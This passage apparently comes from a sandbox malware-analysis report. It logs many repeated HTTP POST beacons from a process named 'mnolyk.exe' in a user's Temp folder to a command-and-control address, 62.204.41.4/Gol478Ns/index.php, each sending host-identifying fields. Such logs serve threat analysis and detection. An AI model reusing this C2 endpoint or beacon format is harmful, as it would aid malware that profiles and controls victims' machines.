                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:24.071053982 CET | 442 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    242 | 192.168.2.3 | 49944 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:24.249933004 CET | 442 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:24.313520908 CET | 443 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    243 | 192.168.2.3 | 49945 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:24.485227108 CET | 443 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:24.553652048 CET | 444 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    244 | 192.168.2.3 | 49946 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:24.773081064 CET | 444 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:24.837829113 CET | 445 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    245 | 192.168.2.3 | 49947 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:25.015743017 CET | 445 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:25.080547094 CET | 446 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    246 | 192.168.2.3 | 49948 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:25.249769926 CET | 446 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:25.313677073 CET | 447 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    247 | 192.168.2.3 | 49949 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:25.497713089 CET | 447 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:25.561935902 CET | 448 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    248 | 192.168.2.3 | 49950 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:25.900036097 CET | 448 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:25.963053942 CET | 449 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    249 | 192.168.2.3 | 49951 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:26.219929934 CET | 449 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:26.287198067 CET | 450 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    25 | 192.168.2.3 | 49727 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:22.887482882 CET | 226 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:22.952716112 CET | 226 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    250 | 192.168.2.3 | 49952 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:26.521262884 CET | 450 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:26.584475040 CET | 451 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    251 | 192.168.2.3 | 49953 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:26.867865086 CET | 451 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:26.933233023 CET | 452 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    252 | 192.168.2.3 | 49954 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:27.113818884 CET | 452 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:27.177083015 CET | 453 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    253 | 192.168.2.3 | 49955 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:27.359899998 CET | 453 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:27.424393892 CET | 454 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    254 | 192.168.2.3 | 49956 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:27.633042097 CET | 454 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:27.698436975 CET | 455 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    255 | 192.168.2.3 | 49957 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:27.889281034 CET | 455 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:27.954535961 CET | 456 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    256 | 192.168.2.3 | 49958 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:28.145173073 CET | 456 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:28.210447073 CET | 457 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    257 | 192.168.2.3 | 49959 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:28.422446966 CET | 457 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:28.485539913 CET | 458 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    258 | 192.168.2.3 | 49960 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:28.668791056 CET | 458 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:28.731478930 CET | 459 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    259 | 192.168.2.3 | 49961 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:28.958110094 CET | 459 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
